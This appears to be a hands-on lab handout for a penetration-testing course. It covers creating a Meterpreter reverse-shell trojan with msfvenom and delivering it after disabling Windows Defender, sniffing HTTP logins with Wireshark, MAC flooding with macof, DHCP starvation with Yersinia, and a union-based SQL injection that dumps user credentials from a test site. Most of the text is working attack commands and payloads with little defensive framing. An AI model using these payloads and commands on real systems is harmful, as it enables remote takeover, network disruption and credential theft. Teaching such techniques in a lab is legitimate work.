Sniffing and SQL Injection

1-Create a Trojan to get a reverse shell access to victims machine

On Kali machine, use msfvenom to create a malicious Windows executable file (.exe) for the reverse
TCP connection to the Windows operating system.

Open a Terminal and type sudo -I

In Kali, execute the following command to learn about msfvenom, which is part of Metasploit.
Determine which payload you want to use. To list the available payload options, type:

Host # msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.12 lport=443 -f exe >

rahul.exe
/Host # python -m SimpleHTTPserver 80

A malicious file, Rahul.exe is created which upon execution on victims’ machine will give a reverse
shell to an attacker.

Launch the Metasploit console

Use exploit/multi/handler
We will use the Metasploit console to set the payload, LHOST & LPORT. Run the exploit

Now, we must download the malicious file on Windows machine (victim)

Before downloading the file, turn of the Windows Defender settings as shown below
And press OK

Turn off the Virus & Threat protection settings as well

Open internet explorer. Enter Kali’s IP in the URL bar along with the name of the file to download

(In an ideal scenario, these malicious files are sent via email or any other malware propagation ways)
Sniffing Network Packets Using Wireshark

Download the Wireshark from the website (https://www.wireshark.org/#download) and install it in

the attacker machine.
Open Wireshark and select the connected network interface and start the sniffing using the green
icon.

It will start sniffing all the packets in-network.

If the victim opens any HTTP protocol websites in the network and logs in with credentials, the
attackers can easily sniff using the Wireshark tool and capture the login details

Filter the protocol with HTTP in the Wireshark tool to view and use the POST method to see the
username and password entered by the victim on a website.

MAC Flooding Using macof

Flood the CAM table of a target system (Window machine)

1-Login to Kali Linux machine, open the terminal. Login as root user ( sudo -I )

2-Install macof tool if it has not already been set. Type ‘apt-get install dsniff’

3-Type man macof on the terminal to look at the manual. Press q to quit the page
Start the mac flooding attack using the following command:

macof -i eth0 -d 10.11.6.26

where -> i = interface (eth0)

d = destination (10.11.6.2 = switch port)

Flooding the switch with bogus MAC’s

You can also specify the number of packets to send by using the following command macof -i eth0 -n
10 -d 10.11.6.1

DHCP attack using Yersinia

Perform DHCP Starvation attack using Yersinia

Launch kali machine and open a terminal.

If yersinia is not installed, install it with the following command
By default, yersinia is installed on kali for penetration testing purpose

Execute the command “yersinia -G” to open yersinia in GUI mode

Click “Edit Interface” to select the interface on which you want to launch the attack. Choose eth0

On the menu bar, click Launch attack. A window pops-up to choose the protocol for attack
Select DHCP and enable the option for sending DISCOVER packet (DHCP DDoS)

The router is flooded with DHCPDISCOVER packets. Observe the number of packets that are sent to
starve the server
SQL Injection

Determine how the hackers may get the database of a website and steal the credentials of users
from website vulnerability.

Open the website (http://testphp.vulnweb.com/).

Select artists→r4w8173

Add a special character after the URL ( ‘ ). If it shows an error, then the website is vulnerable to SQL
Injection.

http://testphp.vulnweb.com/artists.php?artist=1’
Find how many columns are in public by entering the below commands.

http://testphp.vulnweb.com/artists.php?artist=1 order by 1 → No error

http://testphp.vulnweb.com/artists.php?artist=1 order by 2 → No error
http://testphp.vulnweb.com/artists.php?artist=1 order by 3 → No error
http://testphp.vulnweb.com/artists.php?artist=1 order by 4 → Error (N-1=4-1=3)

Find the vulnerable columns of the website using the below commands
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 2 and 3 are vulnerable columns.
Let us select column 2
Find the database name of the website using the below command:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, database(), 3

Select the user's table to view the user's information.

Find the columns in a table using the below command. Change the user's table name to encoding
characters to bypass the firewall by (https://codebeautify.org/string-hex-converter)

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,

group_concat(column_name),3 from information_schema.columns where
table_name=0x7573657273
We need the uname and pass to find the information.
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, group_concat(uname,0x3a, pass)
from users

Try to login with username and password into the website.